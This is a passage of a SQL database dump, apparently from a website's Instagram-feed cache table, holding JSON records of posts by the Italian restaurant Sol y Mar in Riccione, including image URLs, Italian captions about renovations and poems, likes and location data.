mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/84347683_797862837370863_4815195629785805570_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=9PupHqj2jisAX9i9Hau&oh=9ddd91ac17a93bbfb486e8fe7e8fe38f&oe=5EE36FAD\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84347683_797862837370863_4815195629785805570_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=9PupHqj2jisAX9i9Hau&oh=3968e2d2a9483be8e5f42009a92971a4&oe=5EF69EBD\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84347683_797862837370863_4815195629785805570_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=9PupHqj2jisAX9i9Hau&oh=e03350771ae2a0855a0576bea16009dd&oe=5EF8F8EA\"}},\"created_time\":\"1581262624\",\"caption\":{\"id\":\"18049635985223071\",\"text\":\"\\u201cAncora una bellissima domenica, con almeno due motivi per tenere duro quaggi\\u00f9 nell\\u2019Ultima Spiaggia. Il primo, l\\u2019affetto dei nostri Ospiti che ancora oggi erano molti, molti di piu di quelli che la nostra piccola Casa pu\\u00f3 contenere: abbiamo dovuto dire \\u201cno\\u201d a decine. Il secondo, la bellezza rarefatta e stralunata di questo luogo che ormai amiamo, nonostante tutto\\u201d\",\"created_time\":\"1581262624\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":67},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"carousel\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B8WfV_kFz3i\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[],\"carousel_media\":[{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/84347683_797862837370863_4815195629785805570_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=9PupHqj2jisAX9i9Hau&oh=9ddd91ac17a93bbfb486e8fe7e8fe38f&oe=5EE36FAD\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84347683_797862837370863_4815195629785805570_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=9PupHqj2jisAX9i9Hau&oh=3968e2d2a9483be8e5f42009a92971a4&oe=5EF69EBD\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84347683_797862837370863_4815195629785805570_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=9PupHqj2jisAX9i9Hau&oh=e03350771ae2a0855a0576bea16009dd&oe=5EF8F8EA\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/83482971_1073561212997603_4378342759323481099_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=pzI_NettpekAX-CAq9o&oh=8efdcb32678e40fa1ad466d10a282dc0&oe=5EE62EB5\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/83482971_1073561212997603_4378342759323481099_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=pzI_NettpekAX-CAq9o&oh=364ec58766cc2d68bf4eac21182a3593&oe=5F03170E\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/83482971_1073561212997603_4378342759323481099_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=pzI_NettpekAX-CAq9o&oh=79fe64aa8569d7a130f0c96aaa621205&oe=5EF998F3\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/84022731_129482731892415_27967011062740973_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=40mz-yQTrqIAX_-pK9E&oh=c8856c18338c11731a64bb1f257e0bde&oe=5EC5CA6D\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84022731_129482731892415_27967011062740973_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=40mz-yQTrqIAX_-pK9E&oh=b3a853b1f13ce148439204214abbae1a&oe=5EE38C93\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84022731_129482731892415_27967011062740973_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=40mz-yQTrqIAX_-pK9E&oh=8739802835e5e4bd24a8d967a49d8df2&oe=5EC60626\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/83735997_103109987868001_4713337623195131001_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=XkFnKExCfNQAX-mpiEK&oh=718250c27c7f070b6d42a938553700d5&oe=5F02CF25\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/83735997_103109987868001_4713337623195131001_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=XkFnKExCfNQAX-mpiEK&oh=fd24a85005004657c41f43cb7bf0db35&oe=5EC9D335\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/83735997_103109987868001_4713337623195131001_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=XkFnKExCfNQAX-mpiEK&oh=f0c5cb0e8532cc8fd48483223e7d99b1&oe=5EE41062\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/83186684_917456705333959_491010937316577018_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Fx7zcuEWf_YAX-1-miw&oh=2db3d1f517066e006edb221ff25e756d&oe=5EFE9D40\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/83186684_917456705333959_491010937316577018_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Fx7zcuEWf_YAX-1-miw&oh=171e5e4e8a3e9d2a662e20ed804b92a0&oe=5EE1661E\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/83186684_917456705333959_491010937316577018_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Fx7zcuEWf_YAX-1-miw&oh=229e4cf52c553e0a055166c533611d80&oe=5EFF5BF2\"}},\"users_in_photo\":[],\"type\":\"image\"}]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-19'),(26,'2020-02-29 08:35:55','2253010040704695594_8526810189','2020-02-29 08:37:55',NULL,'{\"id\":\"2253010040704695594_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.94.757.757a\\/s150x150\\/87568857_141508517333457_4496592423097818236_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=T21X4e-KC-IAX9cvbfW&oh=ccd669fd4a7c17e8422d231cbd869231&oe=5E9A2B05\"},\"low_resolution\":{\"width\":320,\"height\":399,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/87568857_141508517333457_4496592423097818236_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=T21X4e-KC-IAX9cvbfW&oh=ff76eae798554347184a0a3481e61281&oe=5E81F646\"},\"standard_resolution\":{\"width\":640,\"height\":799,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/87568857_141508517333457_4496592423097818236_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=T21X4e-KC-IAX9cvbfW&oh=800f19dff3523e531df1310620b9356b&oe=5E999711\"}},\"created_time\":\"1582799748\",\"caption\":{\"id\":\"18089967103178456\",\"text\":\"Spremuta d \'Arance is always a good idea .Durante i lavori noi ci  teniamo in forza cos\\u00ec ,e voi?\",\"created_time\":\"1582799748\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":19},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B9ETLHvl30q\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-04-28'),(27,'2020-02-29 08:35:55','2251845791269752816_8526810189','2020-02-29 08:35:55',NULL,'{\"id\":\"2251845791269752816_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.128.1025.1025a\\/s150x150\\/84354334_2931187666975325_4488895608882759581_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=h6W_AjfyVmcAX-vrAq9&oh=ff4c691f9ab6116c1c97b799f6a13438&oe=5E879FD6\"},\"low_resolution\":{\"width\":320,\"height\":400,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/84354334_2931187666975325_4488895608882759581_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=h6W_AjfyVmcAX-vrAq9&oh=c7c61aec6461d74a5b728e643cc4b42e&oe=5E9919A2\"},\"standard_resolution\":{\"width\":640,\"height\":800,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/84354334_2931187666975325_4488895608882759581_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=h6W_AjfyVmcAX-vrAq9&oh=1c7c81259f16af74b4bac363fee145a2&oe=5E8A6D5F\"}},\"created_time\":\"1582660958\",\"caption\":{\"id\":\"17857485751758323\",\"text\":\"Toc Toc ci siete??\\nNo purtroppo ancora siamo chiusi per lavori .Ci vediamo a fine marzo o giu\'di l\\u00ec\",\"created_time\":\"1582660958\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":49},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":1},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B9AKdD9l4_w\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-04-28'),(28,'2020-02-29 08:35:55','2250108132721547744_8526810189','2020-02-29 08:33:55',NULL,'{\"id\":\"2250108132721547744_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.94.757.757a\\/s150x150\\/87524162_851575775269033_8629232850922064662_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=YeajhxIQqaEAX9UTK6C&oh=41acf29b2fce018132d09146534db848&oe=5E896766\"},\"low_resolution\":{\"width\":320,\"height\":399,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/87524162_851575775269033_8629232850922064662_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=YeajhxIQqaEAX9UTK6C&oh=16b659152c54d1af6be80ff813ec10d8&oe=5E82F825\"},\"standard_resolution\":{\"width\":640,\"height\":799,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/87524162_851575775269033_8629232850922064662_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=YeajhxIQqaEAX9UTK6C&oh=83fc41a2995606485483254b81d2d854&oe=5E81DE72\"}},\"created_time\":\"1582453813\",\"caption\":{\"id\":\"17854425193819562\",\"text\":\"23-2-2020 Abbattuto (gioco di parole )\\n\\nA  volte le cose non vanno\\n- nonostante tutto -\\ndi male in peggio.\\nA volte, i giacinti resistono all\\u2019inverno;\\nil verde trionfa; i raccolti sono abbondanti.\\nA volte un uomo punta in alto,\\ne raggiunge il traguardo.\\nA volte la gente rifiuta di farsi guerra;\\ne decide che s\\u00ec, importa,\\nche non \\u00e8 giusto\\nche chi \\u00e8 straniero soffra la fame.\\nE ci sono uomini\\nche diventano quello a cui erano destinati.\\nA volte i nostri migliori sforzi\\nnon sono invano.\\nE il sole a volte scioglie un prato di dolore\\nche sembrava ghiaccio puro.\",\"created_time\":\"1582453813\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":48},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B85_WzVFdng\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-04-28'),(29,'2020-02-29 08:35:55','2249664803420653025_8526810189','2020-02-29 08:31:55',NULL,'{\"id\":\"2249664803420653025_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/81918675_917258695373947_4981754404456616977_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aR1s7PE0i5QAX9ftEgD&oh=e0db7f19baa0e04d8161ecc07101b564&oe=5E98BE66\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/81918675_917258695373947_4981754404456616977_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aR1s7PE0i5QAX9ftEgD&oh=049082a009e1e3fc32ecea4f2ffd3389&oe=5E87B696\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/81918675_917258695373947_4981754404456616977_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aR1s7PE0i5QAX9ftEgD&oh=5853e01ae773173e8f177f8f59e5c47c&oe=5E8E9AC1\"}},\"created_time\":\"1582400964\",\"caption\":{\"id\":\"18043446148228287\",\"text\":\"Ricordi :22 febbraio 2013\",\"created_time\":\"1582400964\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":27},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B84ajgvlkXh\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-04-28'),(30,'2020-02-29 08:35:55','2249338953043195471_8526810189','2020-02-29 08:29:55',NULL,'{\"id\":\"2249338953043195471_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/87223336_190426312303128_1000567044992203978_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=AFovGZ7X5NoAX9-TkaD&oh=ffad6626b33168a15bfd9eb832e3119d&oe=5E98D332\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/87223336_190426312303128_1000567044992203978_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=AFovGZ7X5NoAX9-TkaD&oh=533dca93c3a32085c643f23bf0671526&oe=5E89E8C2\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/87223336_190426312303128_1000567044992203978_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=AFovGZ7X5NoAX9-TkaD&oh=a6eb9a7d1dc0a88f16e51bc8baaf7e12&oe=5E823F95\"}},\"created_time\":\"1582362120\",\"caption\":{\"id\":\"18089789830179610\",\"text\":\"Ci stiamo rifacendo il trucco sar\\u00e0 una trasformazione strutturale importante ma  l Anima b\\u00e8 quella  rimane la stessa\",\"created_time\":\"1582362120\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":55},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B83Qdw7lrZP\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-29'),(31,'2020-02-29 08:35:55','2248597152816593670_8526810189','2020-02-29 08:27:55',NULL,'{\"id\":\"2248597152816593670_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.150.1200.1200a\\/s150x150\\/85136681_674135549991329_348554991232232834_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=v52KgDTAcCMAX-ebRNt&oh=2ee76e0784e383e799828b40685e8b25&oe=5E86B642\"},\"low_resolution\":{\"width\":320,\"height\":400,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/85136681_674135549991329_348554991232232834_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=v52KgDTAcCMAX-ebRNt&oh=36131ee839cfd2e46f483c7b7215dc2a&oe=5E9902E3\"},\"standard_resolution\":{\"width\":640,\"height\":800,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/85136681_674135549991329_348554991232232834_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=v52KgDTAcCMAX-ebRNt&oh=c18c74df69fa2d4dee6ea8d5896b9491&oe=5E8A6D0F\"}},\"created_time\":\"1582273690\",\"caption\":{\"id\":\"17941297711328702\",\"text\":\"Conosco delle barche che non hanno mai smesso di uscire una volta ancora,\\nogni giorno della loro vita\\ne che non hanno paura a volte di lanciarsi\\nfianco a fianco in avanti a rischio di affondare.\\nConosco delle barche\\nche tornano in porto lacerate dappertutto,\\nma pi\\u00f9 coraggiose e pi\\u00f9 forti.\\nConosco delle barche straboccanti di sole\\nperch\\u00e9 hanno condiviso anni meravigliosi.\\nConosco delle barche\\nche tornano sempre quando hanno navigato.\\nFino al loro ultimo giorno,\\ne sono pronte a spiegare le loro ali di giganti\\nperch\\u00e9 hanno un cuore a misura di oceano. \\\"Conosco delle barche\\\" Jacques Brel\",\"created_time\":\"1582273690\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":54},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":2},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B80nzJolnsG\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-29'),(32,'2020-02-29 08:35:55','2248585388708253940_8526810189','2020-02-29 08:25:55',NULL,'{\"id\":\"2248585388708253940_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=e9O27rogoGUAX_VxSuP&oh=0fb8add465a27ceb9e7235a23da3a10d&oe=5E82B9F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c58.0.603.603a\\/s150x150\\/84253852_123328039119494_5590645416125583424_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=VAZLek_J0u8AX9IiTop&oh=5db520276269baeaf974d9e1b83de8a2&oe=5E886CBE\"},\"low_resolution\":{\"width\":320,\"height\":268,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84253852_123328039119494_5590645416125583424_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=VAZLek_J0u8AX9IiTop&oh=f5b7fec0abf2a0ac44bfde40c8778dc0&oe=5E998A4D\"},\"standard_resolution\":{\"width\":640,\"height\":536,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84253852_123328039119494_5590645416125583424_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=VAZLek_J0u8AX9IiTop&oh=14675b8bc09249ba38f7dfa67e9c2286&oe=5E88271A\"}},\"created_time\":\"1582272288\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":35},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B80lH9dFtD0\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-29'),(33,'2020-06-14 13:34:05','2331304075692755904_8526810189','2020-06-14 13:36:05',NULL,'{\"id\":\"2331304075692755904_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y 